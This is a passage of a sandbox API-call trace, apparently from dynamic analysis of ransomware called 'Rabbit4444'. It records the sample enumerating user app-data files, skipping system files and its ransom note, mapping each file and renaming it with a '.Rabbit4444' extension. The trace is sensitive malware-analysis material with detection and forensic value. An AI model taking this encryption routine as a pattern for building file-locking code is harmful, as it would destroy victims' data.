lpString2="windows") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.497] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.2.filtertrie.intermediate.txt" | out: lpString1="0.2.filtertrie.intermediate.txt") returned="0.2.filtertrie.intermediate.txt" [0067.497] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.498] lstrlenW (lpString="0.2.filtertrie.intermediate.txt") returned 31 [0067.498] lstrlenW (lpString="Rabbit4444") returned 10 [0067.498] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.498] lstrlenW (lpString=".dll") returned 4 [0067.498] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.498] lstrlenW (lpString=".lnk") returned 4 [0067.498] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.498] lstrlenW (lpString=".ini") returned 4 [0067.498] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.498] lstrlenW (lpString=".sys") returned 4 [0067.498] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.499] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.499] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15880938926) returned 1 [0067.499] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0067.499] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.500] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0067.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0067.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.501] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15881221424) returned 1 [0067.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0067.502] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.502] CloseHandle (hObject=0x29c) returned 1 [0067.502] CloseHandle (hObject=0x280) returned 1 [0067.502] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.502] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.2.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.502] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31247c5d, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x31247c5d, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x352a25c7, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x710f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.ft", cAlternateFileName="")) returned 1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="Rabbit4444.exe") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2=".") returned 1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="..") returned 1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="windows") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="bootmgr") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="pagefile.sys") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="boot") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="ids.txt") returned -1 [0067.503] lstrcmpiW (lpString1="Apps.ft", lpString2="NTUSER.DAT") returned -1 [0067.503] lstrcpyW (in: lpString1=0x130ec64, lpString2="Apps.ft" | out: lpString1="Apps.ft") returned="Apps.ft" [0067.503] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.ft", dwFileAttributes=0x0) returned 1 [0067.504] lstrlenW (lpString="Apps.ft") returned 7 [0067.504] lstrlenW (lpString="Rabbit4444") returned 10 [0067.504] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0067.504] lstrlenW (lpString=".dll") returned 4 [0067.504] lstrcmpiW (lpString1="s.ft", lpString2=".dll") returned 1 [0067.504] lstrlenW (lpString=".lnk") returned 4 [0067.504] lstrcmpiW (lpString1="s.ft", lpString2=".lnk") returned 1 [0067.504] lstrlenW (lpString=".ini") returned 4 [0067.504] lstrcmpiW (lpString1="s.ft", lpString2=".ini") returned 1 [0067.504] lstrlenW (lpString=".sys") returned 4 [0067.504] lstrcmpiW (lpString1="s.ft", lpString2=".sys") returned 1 [0067.504] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\apps.ft"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.504] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.504] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15881513760) returned 1 [0067.504] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=28943) returned 1 [0067.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0067.505] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7410, lpName=0x0) returned 0x29c [0067.505] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7410) returned 0x70000 [0067.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0067.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0067.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.508] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15881905906) returned 1 [0067.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.508] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0067.508] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.509] CloseHandle (hObject=0x29c) returned 1 [0067.509] CloseHandle (hObject=0x280) returned 1 [0067.509] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.ft.Rabbit4444") returned 168 [0067.509] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\apps.ft"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.ft.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\apps.ft.rabbit4444"), dwFlags=0x1) returned 1 [0067.510] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bae9250, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x1bae9250, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x353872e6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x25cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.index", cAlternateFileName="APPS~1.IND")) returned 1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="Rabbit4444.exe") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2=".") returned 1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="..") returned 1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="windows") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="bootmgr") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="pagefile.sys") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="boot") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="ids.txt") returned -1 [0067.510] lstrcmpiW (lpString1="Apps.index", lpString2="NTUSER.DAT") returned -1 [0067.510] lstrcpyW (in: lpString1=0x130ec64, lpString2="Apps.index" | out: lpString1="Apps.index") returned="Apps.index" [0067.510] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.index", dwFileAttributes=0x0) returned 1 [0067.511] lstrlenW (lpString="Apps.index") returned 10 [0067.511] lstrlenW (lpString="Rabbit4444") returned 10 [0067.511] lstrcmpiW (lpString1="Apps.index", lpString2="Rabbit4444") returned -1 [0067.511] lstrlenW (lpString=".dll") returned 4 [0067.511] lstrcmpiW (lpString1="ndex", lpString2=".dll") returned 1 [0067.511] lstrlenW (lpString=".lnk") returned 4 [0067.511] lstrcmpiW (lpString1="ndex", lpString2=".lnk") returned 1 [0067.511] lstrlenW (lpString=".ini") returned 4 [0067.511] lstrcmpiW (lpString1="ndex", lpString2=".ini") returned 1 [0067.511] lstrlenW (lpString=".sys") returned 4 [0067.511] lstrcmpiW (lpString1="ndex", lpString2=".sys") returned 1 [0067.511] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\apps.index"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.512] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.512] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15882248795) returned 1 [0067.512] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=154830) returned 1 [0067.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0067.512] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25fd0, lpName=0x0) returned 0x29c [0067.513] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25fd0) returned 0x70000 [0067.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0067.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0067.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.521] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15883140243) returned 1 [0067.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0067.521] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.522] CloseHandle (hObject=0x29c) returned 1 [0067.522] CloseHandle (hObject=0x280) returned 1 [0067.522] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.index.Rabbit4444") returned 171 [0067.522] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\apps.index"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\Apps.index.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\apps.index.rabbit4444"), dwFlags=0x1) returned 1 [0067.523] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bae9250, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x1bae9250, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x353872e6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x25cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.index", cAlternateFileName="APPS~1.IND")) returned 0 [0067.523] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0067.523] lstrcpyW (in: lpString1=0x130ec64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.524] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0067.524] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.525] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.525] CloseHandle (hObject=0x280) returned 1 [0067.525] CloseHandle (hObject=0x228) returned 1 [0067.525] GetCurrentThreadId () returned 0xd98 [0067.525] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0067.525] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}" [0067.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0067.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}" [0067.531] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\" [0067.531] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\.BFC0E91B00AE8A0620D3" [0067.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.535] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.538] FlushFileBuffers (hFile=0x228) returned 1 [0067.539] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.539] CloseHandle (hObject=0x228) returned 1 [0067.539] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}") returned 149 [0067.539] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.539] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x249cf976, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24d16d3f, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xf193803b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0067.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.540] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.540] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.540] lstrcmpiW (lpString1=".", 